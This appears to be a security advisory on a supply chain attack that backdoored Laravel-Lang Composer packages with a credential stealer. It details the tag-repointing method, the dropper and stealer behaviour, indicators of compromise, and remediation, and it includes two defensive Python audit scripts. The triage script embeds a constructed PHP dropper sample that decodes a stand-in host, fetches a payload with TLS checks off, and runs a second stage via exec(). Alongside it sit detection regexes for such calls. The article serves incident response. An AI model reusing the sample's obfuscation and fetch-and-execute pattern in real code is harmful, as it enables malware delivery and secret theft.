An active supply chain attack against the community-maintained Laravel-Lang project has backdoored 233 historical versions across four widely used Composer packages, injecting a credential stealer that executes on every PHP request and exfiltrates cloud keys, Kubernetes tokens, CI/CD secrets, SSH keys, and browser data. Aikido Security detected the campaign on May 22, 2026; Socket published corroborating analysis early on May 23.
What Happened
The compromised packages are laravel-lang/lang (7.8k GitHub stars), laravel-lang/attributes, laravel-lang/http-statuses, and laravel-lang/actions. These are not part of the official Laravel framework — they are third-party localization packages pulled in by a large number of Laravel applications.
The attack technique is what makes this dangerous and hard to spot: the malicious code was never committed to the official repositories. GitHub serves commits from any fork in a repository's network under the upstream repository's URL, so a tag in the upstream repository can point at a commit that exists only in a fork. The attacker created a malicious fork, then repointed existing release tags across the 12.x, 13.x, 14.x, and 15.x lines to commits in that fork; the branches of the upstream repositories never changed. Tags were republished in rapid succession on May 22 and 23, many only seconds apart, a pattern consistent with automated mass re-tagging by someone holding organization-level access or control of release automation. A repointed tag can be spotted from a clone of the upstream repository: after git fetch --tags, git branch -r --contains <tag-commit> lists no branch for a tag whose commit lives only in a fork.
Because Packagist resolves versions from git tags, anyone running composer update, or composer install without a committed composer.lock, against an affected constraint pulled a poisoned version. An existing lock file records the commit that was resolved earlier, so composer install from an unchanged lock kept the old code. Packagist removed the malicious versions and temporarily unlisted the packages after Aikido and Socket reported the campaign.
Technical Details
Stage 1 — the dropper. Each poisoned version added src/helpers.php and registered it in composer.json under autoload.files. Composer includes autoload.files entries unconditionally whenever vendor/autoload.php is loaded, whether or not the package's own classes are ever used, so the backdoor runs on every PHP request handled by the application. The dropper fingerprints the host (an MD5 of file path, hostname, and inode), writes a marker file to the system temp directory so it fires only once per host, and rebuilds its C2 hostname at runtime from an integer array to defeat static scanners. It decodes to flipboxstudio[.]info. The dropper fetches a second stage from flipboxstudio[.]info/payload with TLS verification disabled and a spoofed Mozilla user agent, stages it under <tmp>/.laravel_locale/, then executes it in the background via exec() on Linux/macOS or a dropped .vbs launcher run through cscript on Windows.
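The following is an added triage script for this article, not code from the campaign, from Laravel-Lang, or from Aikido or Socket. It shows the two checks a responder wants against a vendor tree: enumerate every file a package forces Composer to include through autoload.files, and decode any integer array that is turned into a string with chr() so a hidden hostname becomes readable. The sample package it builds in a temp directory is constructed for the demo (the decoded hostname is a reserved example name, not the real C2), and the flag names and regexes are my own approximations of the dropper behaviours described above.

```python
"""Triage helper for Composer autoload.files backdoors (added example; constructed data)."""
from __future__ import annotations
import json
import re
import tempfile
from pathlib import Path

# Arrays of four or more byte values, e.g. [104, 111, 115, 116]; four is a guess at
# the shortest array worth decoding, not something the campaign defines.
INT_ARRAY = re.compile(r"\[\s*(\d{1,3}(?:\s*,\s*\d{1,3}){3,})\s*\]")

# Dropper-like behaviour; each name and regex is an assumption of this example.
FLAGS = {
    "chr_decode": re.compile(r"array_map\s*\(\s*['\"]chr['\"]"),
    "tls_verify_off": re.compile(
        r"CURLOPT_SSL_VERIFY(?:PEER|HOST)\s*(?:=>|,)\s*(?:false|0)\b", re.I),
    "background_exec": re.compile(r"\b(?:exec|shell_exec|popen|proc_open|system)\s*\("),
    "marker_file": re.compile(r"sys_get_temp_dir\s*\("),
}


def autoload_files(package_dir: Path) -> list[Path]:
    """Files Composer includes on every request for this package (autoload.files)."""
    composer = json.loads((package_dir / "composer.json").read_text())
    files = composer.get("autoload", {}).get("files", [])
    return [package_dir / f for f in files]


def decode_int_arrays(source: str) -> list[str]:
    """Turn every printable-ASCII byte array in the source into text."""
    decoded = []
    for match in INT_ARRAY.finditer(source):
        values = [int(v) for v in match.group(1).split(",")]
        if all(32 <= v < 127 for v in values):
            decoded.append("".join(chr(v) for v in values))
    return decoded


def scan_file(path: Path) -> dict:
    src = path.read_text(errors="replace")
    return {
        "file": str(path),
        "flags": [name for name, rx in FLAGS.items() if rx.search(src)],
        "decoded": decode_int_arrays(src),
    }


def scan_package(package_dir: Path) -> list[dict]:
    """Scan only what Composer will auto-include; those files run without being called."""
    return [scan_file(p) for p in autoload_files(package_dir) if p.exists()]


# Constructed sample mimicking the dropper's shape; the array decodes to
# "c2.example.invalid", a reserved name, not the real C2.
SAMPLE_HELPERS = r"""<?php
$host = implode('', array_map('chr', [99, 50, 46, 101, 120, 97, 109, 112, 108, 101, 46, 105, 110, 118, 97, 108, 105, 100]));
$marker = sys_get_temp_dir() . '/.marker';
$ch = curl_init("https://$host/payload");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
exec('php ' . sys_get_temp_dir() . '/.stage2.php > /dev/null 2>&1 &');
"""


def build_sample_package() -> Path:
    """Write a throwaway package (constructed) that registers src/helpers.php."""
    root = Path(tempfile.mkdtemp(prefix="autoload-demo-"))
    (root / "src").mkdir()
    (root / "composer.json").write_text(json.dumps(
        {"name": "vendor/demo-locale", "autoload": {"files": ["src/helpers.php"]}}))
    (root / "src" / "helpers.php").write_text(SAMPLE_HELPERS)
    return root


if __name__ == "__main__":
    for finding in scan_package(build_sample_package()):
        print(finding)
```

Run it against each directory under vendor/ rather than the sample to get the same report for a real install; a package that ships a file under autoload.files is not malicious by itself (many legitimate packages register helpers this way), so the decoded strings and the combination of flags are what to read, not the presence of the entry alone.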
Stage 2 — the stealer. The payload is a roughly 5,900-line cross-platform PHP infostealer built from 15-plus collector modules. It harvests AWS, GCP, Azure, DigitalOcean, Heroku, Vercel, Netlify, Railway, and Fly.io credentials — including live EC2 instance metadata from 169.254.169.254; kubeconfig files, Kubernetes service-account tokens, HashiCorp Vault tokens, Helm configs, and Docker config.json; SSH private keys, .git-credentials, .npmrc/.pypirc/.composer/auth.json, and shell history; CI/CD secrets from Jenkins (master.key, credentials.xml), GitLab runners, GitHub Actions, CircleCI, and ArgoCD; saved logins from 17 Chromium browsers (dropping a bundled DebugChromium.exe to defeat Chrome’s App-Bound Encryption) plus Firefox, KeePass, 1Password, and Bitwarden vaults; cryptocurrency wallets; and VPN configs. Results are encrypted with a hardcoded key and sent to flipboxstudio[.]info/exfil, after which the payload deletes itself.
Impact
Any host that ran a poisoned version should be treated as compromised, not merely exposed. That includes production servers, containers, CI runners, and developer workstations — anywhere the application executed. Because the dropper is loaded on every PHP request and runs on the first one it sees, a single request to an application carrying a poisoned version is enough for full secret theft; the marker file in the temp directory only stops it from repeating.
What To Do Now
Check composer.lock for laravel-lang/lang, laravel-lang/attributes, laravel-lang/http-statuses, and laravel-lang/actions, and block these packages until clean versions are confirmed. Rotate every secret reachable from affected hosts: cloud credentials, Kubernetes service-account and Vault tokens, CI/CD secrets, GitHub/GitLab tokens, SSH keys, Docker registry tokens, the Laravel APP_KEY, database credentials, and API keys. Rebuild affected hosts, containers, and CI runners from known-good images, and preserve composer.lock, the Composer cache, DNS logs, and cloud/Kubernetes audit logs before cleanup; the stealer deletes itself after exfiltration, so an absent payload is not evidence that a host is clean. Going forward, rely on the commit SHA rather than the tag: a committed composer.lock records the exact commit for each package, so deploying with composer install from that lock file, and treating any lock diff in which a package's locked reference changes while its version does not as a release to investigate, blocks this specific tag-repointing technique.
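The following is an added example of the composer.lock review described in this section; it is not tooling from Aikido, Socket, Packagist, or Laravel-Lang. It reports which of the four packages a lock file contains, the version and locked commit reference for each, and whether the version sits in one of the re-tagged release lines, and it diffs two lock files for the tell-tale sign of a repointed tag: the same version string resolved to a different commit. The lock files it builds are constructed and the SHAs are placeholders, not the real good or malicious commits.

```python
"""Audit composer.lock for the Laravel-Lang campaign (added example; constructed data)."""
from __future__ import annotations
import json

AFFECTED = {
    "laravel-lang/lang",
    "laravel-lang/attributes",
    "laravel-lang/http-statuses",
    "laravel-lang/actions",
}
# Release lines the advisory says were re-tagged.
AFFECTED_MAJORS = {12, 13, 14, 15}


def major_of(version: str) -> int | None:
    """Major number of a tag like v15.0.0; None for branch aliases such as dev-main."""
    head = version.lstrip("v").split(".", 1)[0]
    return int(head) if head.isdigit() else None


def locked_refs(lock_text: str) -> dict[str, tuple[str, str | None, str]]:
    """name -> (version, locked commit reference, section) for every package in the lock."""
    lock = json.loads(lock_text)
    refs = {}
    for section in ("packages", "packages-dev"):
        for pkg in lock.get(section, []):
            ref = (pkg.get("dist") or {}).get("reference") or (pkg.get("source") or {}).get("reference")
            refs[pkg["name"]] = (pkg["version"], ref, section)
    return refs


def audit_lock(lock_text: str) -> list[dict]:
    """Findings for the affected packages: what was installed and which commit it came from."""
    findings = []
    for name, (version, ref, section) in locked_refs(lock_text).items():
        if name in AFFECTED:
            findings.append({
                "name": name,
                "version": version,
                "reference": ref,
                "section": section,
                "in_affected_line": major_of(version) in AFFECTED_MAJORS,
            })
    return findings


def lock_references_changed(old_lock: str, new_lock: str) -> list[tuple[str, str, str]]:
    """Packages whose version is unchanged but whose locked commit moved between two locks.
    A repointed tag produces exactly this signature when composer update regenerates the lock."""
    old, new = locked_refs(old_lock), locked_refs(new_lock)
    return [
        (name, version, ref)
        for name, (version, ref, _section) in new.items()
        if name in old and old[name][0] == version and old[name][1] != ref
    ]


def _lock(entries: list[tuple[str, str, str]]) -> str:
    """Minimal composer.lock with only the fields the audit reads (constructed)."""
    return json.dumps({
        "packages": [
            {"name": n, "version": v,
             "source": {"type": "git", "url": f"https://github.com/{n}.git", "reference": r},
             "dist": {"type": "zip", "reference": r}}
            for n, v, r in entries],
        "packages-dev": [],
    })


# Placeholder SHAs; not the real good or malicious commits.
GOOD_REF, FORK_REF = "a" * 40, "b" * 40
OLD_LOCK = _lock([("laravel-lang/lang", "15.0.0", GOOD_REF),
                  ("laravel-lang/attributes", "14.2.0", "c" * 40),
                  ("vendor/unrelated", "2.1.0", "d" * 40)])
NEW_LOCK = _lock([("laravel-lang/lang", "15.0.0", FORK_REF),   # same tag, different commit
                  ("laravel-lang/attributes", "14.2.0", "c" * 40),
                  ("vendor/unrelated", "2.1.0", "d" * 40)])

if __name__ == "__main__":
    for finding in audit_lock(NEW_LOCK):
        print(finding)
    print("repointed:", lock_references_changed(OLD_LOCK, NEW_LOCK))
```

Feed the script the lock file committed before the incident window and the one currently in the repository or on the host; the reference column is what to compare against the commit hashes published for the clean and malicious versions, and the same-version-different-commit check is worth wiring into CI on every lock file change, not only for these four packages.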
Indicators of Compromise
- C2 domain: flipboxstudio[.]info
- Payload fetch: flipboxstudio[.]info/payload; exfiltration: flipboxstudio[.]info/exfil
- Malicious file: src/helpers.php, registered under autoload.files in the package's composer.json
- Staging path: <tmp>/.laravel_locale/
- Windows artifact: DebugChromium.exe
- Behavioral: background php or cscript execution launched from the PHP process serving a request, reads of /var/run/secrets/ and /proc/[pid]/environ, outbound requests to flipboxstudio[.]info